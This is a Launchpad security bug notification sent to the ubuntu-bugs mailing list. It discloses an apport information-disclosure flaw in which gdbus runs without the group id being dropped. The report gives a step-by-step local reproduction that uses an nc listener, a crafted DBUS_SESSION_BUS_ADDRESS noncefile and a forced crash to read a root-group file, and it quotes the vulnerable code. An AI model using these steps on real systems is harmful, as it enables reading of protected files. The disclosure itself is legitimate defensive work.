*** This bug is a security vulnerability *** You have been subscribed to a public security bug by Seth Arnold (seth-arnold):
-- VULNERABILITY DETAILS ------------------------
* Version tested:18.04.4 LTS amd64 server
* Installer file:ubuntu-18.04.4-live-server-amd64.iso
* Platform tested:-
---
### Analysis
Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is
in a closing user session. Before executing the binary, it drop privilege to
crashed process's uid. But it doesn't drop group id, so it can be used to leak
file which is owned by root group.
It leads to anyone can read the file which can only be read by root group, but
the file size must be 16bytes.
reproduce step
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$
DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile
sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH
zdi@ubuntu:/tmp$
```
~~~C++
orig_uid = os.geteuid()
os.setresuid(-1, os.getuid(), -1) <-- did not set gid
try:
gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
'org.gnome.SessionManager', '-o',
'/org/gnome/SessionManager', '-m',
'org.gnome.SessionManager.IsSessionRunning'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
(out, err) = gdbus.communicate()
if err:
error_log('gdbus call error: ' + err.decode('UTF-8'))
except OSError as e:
error_log('gdbus call failed, cannot determine running session: ' +
str(e))
return False
finally:
os.setresuid(-1, orig_uid, -1)
~~~
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day
Initiative
** Affects: apport (Ubuntu)
Importance: Medium
Status: Fix Released
** Affects: apport (Ubuntu Xenial)
Importance: Medium
Status: Fix Released
** Affects: apport (Ubuntu Bionic)
Importance: Medium
Status: Fix Released
** Affects: apport (Ubuntu Eoan)
Importance: Medium
Status: Confirmed
** Affects: apport (Ubuntu Focal)
Importance: Medium
Status: Fix Released
--
[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure
Vulnerability
https://bugs.launchpad.net/bugs/1885633
You received this bug notification because you are a member of Ubuntu Bugs,
which is subscribed to the bug report.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
